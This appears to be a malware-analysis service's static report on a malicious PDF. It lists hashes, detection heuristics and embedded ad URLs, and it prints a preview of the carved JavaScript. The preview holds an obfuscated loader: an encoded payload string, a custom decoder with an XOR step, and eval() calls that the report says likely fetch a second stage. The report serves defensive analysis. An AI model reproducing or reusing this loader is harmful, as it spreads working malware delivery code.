Malicious PDF — malware analysis report

Static analysis result for SHA-256 ee4a2931cf42bf6f…

MALICIOUS

PDF

7.8 KB Created: 2008-31-20 53:85:00 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-10
MD5: 6c9661e48deef3511d725b67c8367ac7 SHA-1: 91ce05bbd333d64cff3d4731d7423b09697d12a6 SHA-256: ee4a2931cf42bf6f5b03ca2c2746db8f5b70c9888a83f79c217b28aee3a59ce3
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with multiple eval() calls, indicating an attempt to obfuscate malicious code execution. The script reconstructs a string using character code manipulation, likely to download and execute a second-stage payload. The presence of obfuscated JavaScript and eval() calls strongly suggests a malicious intent, though the exact payload is not immediately clear from static analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    stream
function XZB5HYBlORk() {var datfield = 'Mr'+'SBIxqeUXKjxOKe'+'Mc27L'+'yZ6Mm05IIachn8nMra6Lws62VWbMmG'+'B5NvEJNq0xvKqiIJ1k'+'N'+'sW'+'rt'+'GBsPq'+'c3g_ef'+'p202P8cMdKz2ba1MQq0'+'xvKqiIJ1kNsWrtGB'+'Lza1LOs6h'+'CqE'+'aGSR7Ir'+'Rmz'+'vQp006It_jELs1htCb'+'ows7d'+'c27'+'0'+'L45o'+'X_ettsz1VsqgTAUMJ06It'+'_jELs1htCb'+'ow'+'s7SPq0xv'+'KqiI'+'J1k'+'NsWrtGBLpS'+'6ywK'+'6IXWbuNhEsGSR7IrRmzCNIn8nM_S1f'+'y45Lxq0xvKqiIJ1k'+'NsWrtGBpP9UMr'+'a6Lws62VWb'+'MQ'+'D1U'+'te5nyiWs'+'N9Q'+'MYK7xIW5MuGBE'+'CsR'+'xP9'+'X …
endstream
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://phpnet.us/byet300x250.php In PDF document text
    • http://ad.foxnetworks.com/st?ad_type=pop&ad_size=0x0&section=204717&banned_pop_types=28&pop_times=5&pop_frequency=86400In PDF document text

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x38F 5819 bytes
SHA-256: d75750ee0b1ecd5a4c09c8184c48fc3ac421dc073de230fe25946c46c64bb091
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function XZB5HYBlORk() {var datfield = 'Mr'+'SBIxqeUXKjxOKe'+'Mc27L'+'yZ6Mm05IIachn8nMra6Lws62VWbMmG'+'B5NvEJNq0xvKqiIJ1k'+'N'+'sW'+'rt'+'GBsPq'+'c3g_ef'+'p202P8cMdKz2ba1MQq0'+'xvKqiIJ1kNsWrtGB'+'Lza1LOs6h'+'CqE'+'aGSR7Ir'+'Rmz'+'vQp006It_jELs1htCb'+'ows7d'+'c27'+'0'+'L45o'+'X_ettsz1VsqgTAUMJ06It'+'_jELs1htCb'+'ow'+'s7SPq0xv'+'KqiI'+'J1k'+'NsWrtGBLpS'+'6ywK'+'6IXWbuNhEsGSR7IrRmzCNIn8nM_S1f'+'y45Lxq0xvKqiIJ1k'+'NsWrtGBpP9UMr'+'a6Lws62VWb'+'MQ'+'D1U'+'te5nyiWs'+'N9Q'+'MYK7xIW5MuGBE'+'CsR'+'xP9'+'XMP2'+'cl'+'p'+'sEgxiBlpZnM'+'rS'+'BIxq'+'0ev'+'0W3v_qwOS'+'6fnK7SP96LyZ5gIs5@'+'Nq7@gKRm'+'uiE@gKRm'+'ui'+'E@gKRmuiE@gKEby04@gDEmge4@g4Rxpvn@gKnl_vn@gKnlPAE@gSW'+'bwi'+'E@gSWI'+'u'+'iE@gSWU'+'L'+'v4@gSW'+'9PAR@g4W'+'byC4@g4WbL0W@'+'gKnUOeW@gKWbtAW@gSW'+'by0W@g4Rfg0W@gSW'+'m'+'m0W@gSnbL2R'+'@gKRIrCE@gSnbL2'+'R@g4RB'+'yCR@'+'gSWbxiE@'+'gSWby'+'04@g4Rfg0W@g44APiE@g4RHQi'+'R@gS'+'WHmv'+'E@'+'gKEPPi'+'E@gSWbIA'+'E@gSWb'+'y0W@gS45'+'LeR@g4'+'4A'+'g0'+'4@gD'+'RPQiR@'+'g4R3m'+'AE'+'@gKE'+'PgvE@gS'+'WbIeW@gSWb'+'y0W@gS45LeR@'+'g44AgCR@gD45'+'NiR@gS'+'ElgeW@gKE'+'P'+'_2W@'+'gSWbx2W@gSWby0W@gS'+'45L'+'eR@g44'+'AgCE@gKElQiR@gKEbvAE@gKE'+'PQeW@'+'gSWb'+'we4@gS'+'Wby0W@g'+'S4'+'5Le'+'R@g44Ar0W@g4'+'EBN'+'iR'+'@gKE5XeR@gKEP'+'giR@gSWb'+'vAn@g'+'SWby0W@gS45LeR@gS4b'+'L04@gKWPreW@gSn5vi4@'+'g4'+'Rx'+'m'+'AR@g4'+'WPm'+'v4@g'+'SW9PeR@gSWbyvW@g44Hg0W@gS'+'n5LeR@'+'g4Rfp04@gSWUIv4@'+'gSWBNAR@g4Rf_0R@g4WP_v4@'+'gKEP_vn@'+'gSWbL'+'2R@gSW'+'b'+'y0W@gK'+'nP_0W@g4W3u'+'vn@gSnbwLE@gDR9Pi'+'R@gS'+'Wby0W@g4Rxg0W@'+'g'+'4Wmm'+'v4@g'+'4E5L'+'2R@g4Eb'+'L'+'i4@g4R'+'x_0W@gD4bIv4@gSElQiR@gSWby0W@g44by0W@gS45L2R@gKn3r04'+'@g'+'44xgLW@'+'g445L2R@'+'gKE'+'PrCR@gSWbNAW@g'+'SWby0W@gS'+'45yC4@g4E9p0W'+'@g4'+'4mg0W@gD4HnA'+'E@g4E9QA4'+'@gSWUI'+'0W'+'@gK'+'n5Xi'+'R@gS'+'Wby0'+'W@gSn5I2'+'E@g4R'+'f'+'p0W'+'@gSWmmv4@'+'g'+'SWBNAR@g4R'+'f'+'_0R@g4WP_v4'+'@gS'+'4bx'+'iR'+'@gSWby0W'+'@gKn'+'3g0W'+'@g44PgLn@gS45yC'+'4@gKW'+'c'+'w04'+'@g44'+'c'+'w'+'2R@gSEl_C'+'4@gD4bXA4@g44c'+'v0W@gS'+'4'+'5'+'L2R@gKn3rCE@g44xgv4@g'+'445L'+'2R@'+'gKEPrCR'+'@g'+'SWbwC4@'+'gSWby0W'+'@'+'gSWb'+'NA'+'R@gSn5I2E@'+'g4Rfp0W'+'@g'+'SWPmv4'+'@gSW1NAR@g4Rf_0R@g4WP_v'+'4@g4W'+'bxiR@gSWby0W@gKn3g0W@g4Rfm2E@g4WbIv'+'4@gSWBNAR@g4Rf_0R@g4WP'+'_v'+'4@'+'gSWbxiR@g'+'SWby0W@'+'gS4'+'By0W@g441vL'+'R@gKEByC4@gKEByC4'+'@gKEByC4'+'@gKEB'+'yC4@gKEmri4@g443g04@g4Rf_C4@gKE1w'+'AR@g4'+'41'+'I2n@gKEbI2E@'+'g4'+'Rf_v4@g4RfPiE@gSWPneE@g44I'+'r'+'2R@g4'+'4AgCE@gSncL2R@g4RfuCE@g4WHne'+'4@gSWcXiR@g44Ami4'+'@gS'+'nAr2R'+'@g'+'S'+'Wcw0'+'W@g'+'KWcIi4'+'@g'+'S4x_eR@gKRI'+'mv'+'W@g4EcyC4@gKWcvvn@gSWlmAn@g4WbyAE@gSE1t'+'vR'+'@gSWPne4@g4EH_'+'AW@gSWcy0'+'E@gS4bI2W@gSEBx2R@gSEHu'+'LR@gS'+'n'+'5vvE@'+'g44'+'3PA4@g'+'KE'+'fr2R@g443r'+'2R@'+'g'+'SW'+'cw0'+'4@gKnApeE@g'+'SWmr2R'+'@g4Rf'+'mLR@g4Wm_v'+'R@gDEIgC4@gS'+'WUL2R@'+'gSWcL2R@g44H_A4@g4E1v0E@'+'gSWbyCR@gSEUxiR@gS'+'ElmAE@'+'g445I2E@gS'+'4m_L'+'W@g'+'S4'+'lm0E@gSWbI'+'vE@'+'gDRfr'+'2n@'+'gDRld2R@g'+'4EbwA4@g4RUveW@gDRIrAE@gDEfri4'+'@gDExpi'+'E@g4EBweE@g4'+'Rc'+'w2E'+'@g4EBO2n@g4R3'+'rA'+'W'+'@g4EbO2R'+'@g4Rb'+'Li4@g4'+'RfrAE@g'+'D'+'Rl'+'_AW@'+'g'+'DRl'+'r2n@g4'+'RApeW@gDE1L2R@gDElpeE'+'@'+'gDEHpeR'+'@gDRm_'+'eR@g'+'4RcO2E@gDEfp2Wyn8nMrSBIxhqTyie'+'Q'+'OvRPCSnIP9XMP2cfP2ElP2EpPq'+'6FvK'+'7oCvjl'+'gvE@y'+'LciXC6rbL7SPq0ev0W3v_'+'qwOS6fn'+'4NsyWbutKzMGh7IY'+'2'+'7xIW5MGSR7'+'IrR'+'mzL7'+'SPhqTyi'+'eQOvRPCSn'+'I'+'P9N'+'MQh'+'qVX'+'rEBIA1BNS'+'jeODbWThE9w2n2Y27'+'xIW5MJ06It_jELs1'+'ht'+'Cbows7SP96L'+'yZ5gIs5@N'+'q7@gSn'+'ln2E@gSnln2Eyn8nMJ06It_j'+'ELs1'+'htCbows7SP9e'+'gI'+'L'+'JHjLQ0L45o'+'X_ett'+'s'+'z1'+'Vsqgbh7'+'w'+'yAqEtiE'+'WX8nMrSBIxq6Tv'+'4'+'jzv_12NS'+'6LtK7SPhQ'+'owaeOteRM'+'ch7l'+'QKRlP2El'+'PAQruJj3pGqz'+'yi6w'+'XeEpPq1rvK7'+'hrSB'+'Ix'+'95EOSW7U'+'2Epm'+'SePyvqar'+'4jICGWXyaz9y4bfTA5'+'EOSW'+'7T8Q2'+'P8c'+'M_J4ANJ6PxGjHIG'+'6By_'+'VMc2'+'70L45oX_ettsz1Vsqg'+'x'+'8'+'QM'+'JvJULv6XyJc'+'PyKRAT27Sx9UMra'+'6Lws62V'+'WbMJ'+'W6qI4WHIA'+'qIyazr'+'wv'+'Ehnh'+'7'+'pxq'+'6FvK75UvnLL'+'K7SP9'+'Blx4NxXa1PyW5NyW5mXZb'+'L0h6rwr6IXWbuN'+'9QpP944Xe'+'b'+'x'+'x'+'9XMmv0AJW6L_S1lbaBgys'+'Qrz'+'rWrdsNy_9'+'QpPq6F'+'vK7Rw0eIrD'+'0PCs7SPqb@OK75v45FXKQ'+'5UvnLL4NgNa'+'BIIL6hPAQsmv0AJW6Lpsz'+'FvS'+'4f'+'N9E2'+'z94'+'4Xebx08BhIW55tKQI'+'n9QpP'+'9ztxhQhPG'+'4Xve6JO4zYxAVM'+'cAXMQ27tr'+'h7hQ'+'hecvJExVC6OT_EDx9XS'+'P9EMrqoMPG4Xve6JO4zYvA'+'VMz'+'27Inh7abK7'+'R'+'w0e'+'IrD'+'0PCZjHcr7aP9E2nh7abK7'+'hPG4'+'Xve6JO4zYxA'+'VMcA'+'XMd2'+'7trh7Rw0'+'e'+'IrD0PCZjHcr7aP9E'+'2P'+'hUaxhQ'+'Rw0eIrD0'+'P'+'CZj'+'lcr'+'7'+'aP8R2nh7'+'pxhcuvLRI'+'w'+'_RzbsQ2Y27xI'+'W5MuJ'+'11XeqoXDq9xS4ty'+'s7SP96L'+'yZ5gI'+'s5'+'@'+'N'+'q7@gKEgxiB@g'+'KEgxiByn8nMdKz2b'+'a1huJ11'+'Xeq'+'o'+'XDq9xS'+'4tyWNsyW'+'b'+'utKzMz27fuAn3_AQ'+'MuJ11XeqoXDq'+'9xS4tys7dc2'+'7oLsWArrqAOrclI01@T27fNazm08BrbsbFv'+'Z'+'efVW'+'5'+'@'+'x'+'9XMpCbsbaBy08Brbsb@ws6B'+'UaB2baJ'+'LL'+'Zb'+'hY'+'D53vWz'+'wPq7yz9'+'bmOWnMuJ11XeqoXDq9xS4t'+'yaU2Y27Sx9UMJW6qI4WHIAqIyazrwvEh'+'n8n'; function zO3XCyYZA(U7OYphPUvX1){ var tp = '63@53@24@4@60@48@49@36@41@9@0@0@0@0@0@0@20@8@52@47@44@32@16@46@0@3@62@28@31@17@39@27@6@38@33@12@43@51@59@61@35@42@45@0@0@0@0@14@0@13@55@50@26@56@5@18@25@40@58@21@1@2@34@37@10@57@30@29@23@22@15@11@7@19@54'; var ywjFqJLKBb=0, YWLMh215hP=U7OYphPUvX1.length, qxfiWFtVqzuP=1024, coJWMKvsrGE, gFczf6k, ES01MerLYGAA='', LhRocKftY=ywjFqJLKBb, vorATw=ywjFqJLKBb, viNFjj=ywjFqJLKBb, d6TrGewkLO=Array(); d6TrGewkLO = tp.split('@'); for(eval('gFczf6k=Ma'+'th.'+'ce'+'il(YWLMh215hP'+'/qxfiWFtVqzuP)');gFczf6k>ywjFqJLKBb;gFczf6k--){ for(eval('coJWMKvsrGE=M'+'ath'+'.m'+'in(YWLMh215hP,'+'qxfiWFtVqzuP)');coJWMKvsrGE>ywjFqJLKBb;coJWMKvsrGE--,YWLMh215hP--){ eval('viNFjj|'+'=(d6TrGewkLO['+'U7OYphPUvX1.'+'cha'+'rCo'+'de'+'At(LhRocKftY+'+'+)-48])<'+'<vorATw'); if(vorATw){ eval('ES01MerLYGAA+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](177^'+'viNFjj&'+'25'+'5)'); viNFjj>>=8; vorATw-=2; } else { vorATw=6; } } } eval(ES01MerLYGAA); } zO3XCyYZA(datfield);}

Open this report in the interactive analyzer, or submit your own file for analysis.